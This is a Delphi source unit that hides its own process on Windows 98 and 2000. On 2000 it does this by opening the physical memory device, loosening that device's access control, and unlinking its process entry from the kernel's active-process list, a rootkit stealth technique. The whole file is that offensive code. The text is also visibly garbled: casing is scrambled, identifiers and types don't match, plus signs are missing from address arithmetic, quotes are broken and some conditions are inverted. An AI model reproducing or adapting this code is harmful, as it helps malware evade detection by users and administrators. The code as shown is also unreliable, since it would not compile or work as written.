Process hidden Delphi code
Unit UNITHIDEPROCESS;
Interface
Uses
Windows, Messages, Sysutils, Variants, Classes, Graphics, Controls,
Forms, Dialogs, Registry, Comctrls, Strutils, Stdctrls,
Toolwin, Menus, Imglist, Actnlist, Inifiles, Checklst, FileCtrl, ACLAPI,
Accctrl;
Type
NTSTATUS = longint;
Ushort = byte;
Pwstr = pwidechar;
Ulong = cardinal
Handle = POINTER;
Pvoid = POINTER;
PCWSTR = PWIDECHAR;
Pulong = ^ ulong;
HMODULE = THANDLE;
Const
Status_access_denied = $ c0000022;
RSP_SIMPLE_SERVICE = $ 00000001;
Rsp_unregister_service = $ 00000000;
Type
_Unicode_string = record
Length: ushort;
MaximumLength: Ushort;
Buffer: pwstr;
END;
Unicode_string = _unicore_string;
PUNICODE_STRING = ^ _Unicode_string;
_Object_attributes = record
Length: ulong;
Rootdirectory: Handle;
Objectname: punicode_string;
Attributes: ulong;
SecurityDescriptor: PVOID;
SecurityQualityOfService: pvoid;
END;
Object_attributes = _object_attribute;
POBJECT_ATTRIBUTES = ^ _ Object_attribute;
Zwopensection = Function
SectionHandle: Pinteger;
DESIREDACCESS: Access_Mask;
Objectattributes: POBJECT_ATTRIBUTES
: NTSTATUS; STDCALL;
RTLINITUNICODESTRING = Procedure
DestinationString: punicode_string;
SourceString: PCWSTR
STDCALL;
TMYHIDEPROCESS = Class
Private
Osversion: longint;
RTLinitunicodeString: RTLINITUNICODESTRING;
Zwopense: Zwopense;
g_hntdll: hmodule;
g_pmapphysicalmemory: pvoid;
g_hmpm: thandle;
Function initddll (): bool;
Procedure closentdll ();
Procedure SetPhyscialMemorySectionCanbewrite (HSECTION: THANDLE);
Function openphysicalmemory (): thandle;
Function lineArtophys (baseaddress: pulong; addr: pvoid): pvoid;
Function getData (AddR: pvoid): ulong; function setdata (addr: pvoid; data: ulong): BOOL;
Function hideprocess2000 (): bool;
Procedure hideprocess98 ();
public
Constructor Create (Theosver: longint);
DEStructor destroy ();
Procedure dohideme ();
END;
IMPLEMENTATION
Constructor TMYHIDEPROCESS.CREATE (THEOSVER: LongInt);
Begin
Osversion: = theosver;
END;
Destructor TMYHIDEPROCESS.DESTROY ();
Begin
Closentdll ();
END;
Procedure TmyHideProcess.doHideme ();
Begin
Case (Osversion) of
98:
HideProcess98 ();
2000:
HideProcess2000 ();
END;
END;
Function TMYHIDEPROCESS.INITNTDLL (): BOOL;
VAR
a: longint;
Begin
g_hntdll: = 0;
g_pmapphysicalmemory: = nil;
g_hmpm: = 0;
g_hntdll: = loadingLibrary ('NTDLL.DLL');
IF (g_hntdll = 0) THEN
Begin
Result: = FALSE;
EXIT;
END;
@RtlinitunicodeString: =
GetProcaddress (g_hntdll, 'rtLinitUnicodestring');
@Zwopensection: =
GetProcaddress (g_hntdll, 'zwopensection');
RESULT: = TRUE;
END;
Procedure tmyhideprocess.closeTdll ();
Begin
IF (g_hntdll <> 0) THEN
Begin
Freelibrary (g_hntdll);
END;
END;
Procedure TMYHIDEPROCESS.SETPHYSCIALMEMORYSECTIONCANBEWRITED (HSECTION: THANDLE);
Label Cleanup;
VAR
PDACL, PNEWDACL: PACL;
PSD: PPSecurity_Descriptor;
DWRES: DWORD;
EA: EXPLICIT_ACCESS;
Begin
PDACL: = NIL;
PNEWDACL: = NIL;
PSD: = NIL;
DWRES: = GetSecurityInfo (HSECTION, SE_KERNEL_Object, DACL_SECURITY_INFORMATION,
NIL, NIL, PDACL, NIL, PSD);
IF (DWRES <> Error_Success) THEN
Begin
Goto cleanup;
END;
ZeromeMory (@ea, sizeof (expected_access));
Ea.grfaccesspermissions: = section_map_write
Ea.grfaccessmode: = GRANT_ACCESS;
Ea.grfinheritance: = no_inheritance;
Ea.trustee.trusteeform: = trustee_is_name; ele.trustee.trustetype: = trustee_use_user;
Ea.trustee.ptstrname: = 'current_user';
DWRES: = STENTRIESINACL (1, @ EA, PDACL, PNEWDACL);
IF (DWRES <> Error_Success) THEN
Begin
Goto cleanup;
END;
Dwres: = setsecurityInfo (HSECTION, SE_KERNEL_Object, DACL_SECURITY_INFORMATION, NIL, NIL, PNEWDACL, NIL)
IF (DWRES <> Error_Success) THEN
Begin
Goto cleanup;
END;
Cleanup:
IF (PSD <> nil) THEN
LocalFree (Ulong (PSD));
IF (PNewDACL <> nil) THEN
LocalFree (Ulong (PNewDACL);
END;
Function TMYHIDEPROCESS.OpenPhysicalMemory (): thandle;
VAR
Status: NTSTATUS;
Physmemstring: unicode_string;
Attributes: Object_attribute;
Begin
RtlinitunicodeString (@physmemstring, pcwstr ('// device // physicalmemory ");
Attributes.lendth: = sizeof (Object_attributes);
Attributes.rootdirectory: = NIL;
Attributes.Objectname: = @physmemstring;
Attributes.attributes: = 0;
Attributes.securityDescriptor: = nil;
Attributes.securityquality = nil;
Status: = zwopensection (@ g_hmpm, section_map_read or section_map_write, @ attributes);
IF (status = status_access_denied) THEN
Begin
Status: = zwopensection (@ g_hmpm, read_control or write_dac, @ attributes);
SetPhyscialMemorySectionCanbewrite (g_hmpm);
CloseHandle (G_HMPM);
Status: = zwopensection (@ g_hmpm, section_map_read or section_map_write, @ attributes);
END;
If status = 0 THEN
Begin
Result: = 0;
EXIT;
END;
g_pmapphysicalmemory: = MapViewOffile
g_hmpm,
4,
0,
$ 30000,
$ 1000);
IF (g_pmapphysicalmemory = nil) THEN
Begin
Result: = 0;
EXIT;
END;
Result: = g_hmpm;
END;
/ / ------------------------------------------------------------------------------------------------------------------------------------------------------ ------------- Type
Tarrayulong = array [0..0] of ulong;
PTARRAYULONG = ^ tarrayulong;
/ / -------------------------------------------------------------------------------------------- ------------
Function TMYHIDEPROCESS.LINEARTOPHYS (BaseEaddress: pulong; addr: pvoid): PVOID;
VAR
VADDR, PGDE, PTE, PADDR, TMP: ULONG;
_PGDE: Pulong; Begin
Vaddr: = ulong (addr);
PGDE: = ptaRayulong (BaseAddress) ^ [VADDR SHR 22];
IF ((pgde and 1) <> 0) THEN
Begin
TMP: = pgde and $ 00000080;
IF (TMP <> 0) THEN
Begin
Paddr: = (pgde and $ ffc00000) (Vaddr and $ 003FFFF);
end
Else
Begin
PGDE: = Ulong (MapViewoffile (G_HMPM, 4, 0, PGDE AND $ FFFFF000, $ 1000);
_PGDE: = Pulong (PGDE);
PTE: = ptarayulong (_pgde) ^ [(VADDR AND $ 003FF000) SHR 12];
IF ((PTE and 1) <> 0) THEN
Begin
Paddr: = (PTE and $ ffffff000) (VADDR and $ 00000FFF);
UnmapViewOffile (PVOID (PGDE));
end
Else
Begin
Result: = 0;
EXIT;
END;
END;
end
Else
Begin
Result: = 0;
EXIT;
END;
Result: = PVOID (PADDR);
END;
FUNCTION
TMYHIDEPROCESS.GETDATA (AddR: pvoid): Ulong;
VAR
Phys, RET: ULONG;
TMP: Pulong;
Begin
Phys: = Ulong (lineartophys (pulong (g_pmapphysicalmemory), pvoid (addr));
TMP: = Pulong (MapViewoffile (G_HMPM, 4, 0, Phys and $ FFFFF000, $ 1000));
IF (TMP <> nil) THEN
Begin
Result: = 0;
EXIT;
END;
RET: = PTARRAYULONG (TMP) ^ [(Phys and $ FFF) SHR 2];
UnmapViewoffile (TMP);
Result: = Ret;
END;
Function TMYHIDEPROCESS.SETDATA (AddR: pvoid; data: ulong): BOOL
VAR
Phys, RET: ULONG;
TMP: Pulong;
Begin
Phys: = Ulong (lineartophys (pulong (g_pmapphysicalmemory), pvoid (addr));
TMP: = Pulong (MapViewoffile (g_hmpm, file_map_write, 0, phys and $ fffff000, $ 1000));
IF (TMP <> nil) THEN
Begin
Result: = FALSE; EXIT;
END;
PTARRAYULONG (TMP) ^ [(Phys and $ FFF) SHR 2]: = DATA;
UnmapViewoffile (TMP);
RESULT: = TRUE
END;
Function TMYHIDEPROCESS.HIDEPROCESS2000 (): BOOL;
VAR
Thread, Process, FW, BW: ulong;
Begin
ifinitdll () THEN
Begin
IF (OpenPhysicalMemory () = 0) THEN
Begin
Result: = FALSE;
EXIT;
END;
Thread: = GetData (PVOID ($ FFDFF124));
Process: = GetData (PVOID (THREAD $ 22C));
FW: = GetData (PVOID (Process $ A0));
BW: = GetData (PVOID (Process $ A4));
SetData (PVOID (FW 4), BW);
SetDATA (PVOID (BW), FW);
UNMAPVIEWOFFILE (g_pmapphysicalmemory);
CloseHandle (G_HMPM);
Closentdll ();
END;
RESULT: = true;
END;
Procedure TmyhideProcess.hideProcess98 ();
TYPE PREGISTERSERVICE = Function (A, B: DWORD): Boolean; stdcall;
VAR
Hkernel: hmodule;
RegisterService: PregisterService;
Begin
Hkernel: = loadingLibrary ('kernel32.dll');
IF (Hkernel> 0) THEN
Begin
@RegisterService: = getProcaddress (Hkernel, 'registerServiceProcess ");
RegisterService (), RSP_SIMPLE_SERVICE;
Freelibrary (Hkernel);
Hkernel: = 0;
END;
END;
End.
